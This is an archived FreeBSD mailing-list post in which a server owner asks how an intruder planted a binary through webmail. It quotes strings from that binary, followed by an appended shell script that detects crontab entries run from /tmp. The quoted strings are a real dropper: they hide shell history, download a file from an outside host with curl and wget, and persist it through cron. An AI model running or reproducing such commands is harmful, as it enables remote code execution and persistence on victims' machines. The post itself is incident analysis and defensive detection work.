what www perl script is running?

Colin Brace cb at lim.nl
Thu Aug 27 09:52:03 UTC 2009



Colin Brace wrote:
> 
> ahhhhh, another directory found in /tmp with files written by www called
> .bash/ Contents here:
> 
> http://silenceisdefeat.com/~cbrace/www_badstuff-3.gz
> 
Apropos of the contents of the above, a correspondent writes: 

[...]
running 'strings' on /tmp/owned will show 
"HISTFILE=/dev/null
cd /tmp;curl -s -O http://www.tirnaveni.org/tmpfile 2>&1 >/dev/null
cd /tmp;wget -b http://www.tirnaveni.org/tmpfile 2>&1 >/dev/null
echo '*/1 * * * * perl /tmp/tmpfile' >cron.job
crontab cron.job
rm -rf cron.job
chmod 0100 /tmp/tmpfile 2>&1 >/dev/null
perl /tmp/tmpfile 2>&1 >/dev/null"
[...]

So this would be the original mischief-maker.

Just out of curiosity, can someone explain to me in basic terms how an
intruder exploits a vulnerability such as apparently existed on my system
(the RoundCube webmail package was apparently the culprit) to place the
binary file "owned" in /tmp and execute it?

Thanks

-----
  Colin Brace
  Amsterdam
  http://lim.nl
-- 
View this message in context: http://www.nabble.com/what-www-perl-script-is-running--tp25112050p25167487.html
Sent from the freebsd-questions mailing list archive at Nabble.com.
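
The strings output quoted above shows a crontab entry being installed that runs `perl /tmp/tmpfile` every minute. As an added example (not part of the original message), this shell function flags per-user crontab entries that execute from temp directories; the sample crontab, the function names and the interpreter list are constructed assumptions.

```shell
#!/bin/sh
# Added example: flag per-user crontab entries (crontab -l format) that run
# files from temp directories, as the cron.job line in the strings output does.

# Constructed sample: the first entry mirrors the dropper's cron line; the
# rest are made-up entries for contrast.
sample_crontab() {
cat <<'EOF'
# m h dom mon dow command
*/1 * * * * perl /tmp/tmpfile
0 3 * * * /usr/local/bin/backup.sh >/dev/null 2>&1
@reboot /var/tmp/.bash/start
15 * * * * find /tmp -type f -mtime +7 -delete
EOF
}

# Reads crontab text on stdin and prints entries whose command is a path
# under /tmp, /var/tmp or /dev/shm, or an interpreter given such a script.
flag_tmp_cron() {
    awk '
    /^[ \t]*#/ || /^[ \t]*$/ { next }                 # comments, blank lines
    /^[ \t]*[A-Za-z_][A-Za-z0-9_]*[ \t]*=/ { next }   # environment settings
    {
        first = ($1 ~ /^@/) ? 2 : 6   # @reboot etc. use one schedule field
        if (NF < first) next
        cmd = $first; hit = 0
        if (cmd ~ /^\/(tmp|var\/tmp|dev\/shm)\//) hit = 1
        else if (cmd ~ /(^|\/)(perl|python[0-9.]*|sh|bash|php|ruby)$/) {
            # first non-option argument is the script the interpreter runs
            for (i = first + 1; i <= NF; i++) {
                if ($i ~ /^-/) continue
                if ($i ~ /^\/(tmp|var\/tmp|dev\/shm)\//) hit = 1
                break
            }
        }
        if (hit) print
    }'
}

# On a live host: crontab -l -u www | flag_tmp_cron
sample_crontab | flag_tmp_cron
```

The `find /tmp` entry is deliberately left unflagged: it only names /tmp as an argument to a non-interpreter command and does not execute anything stored there.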


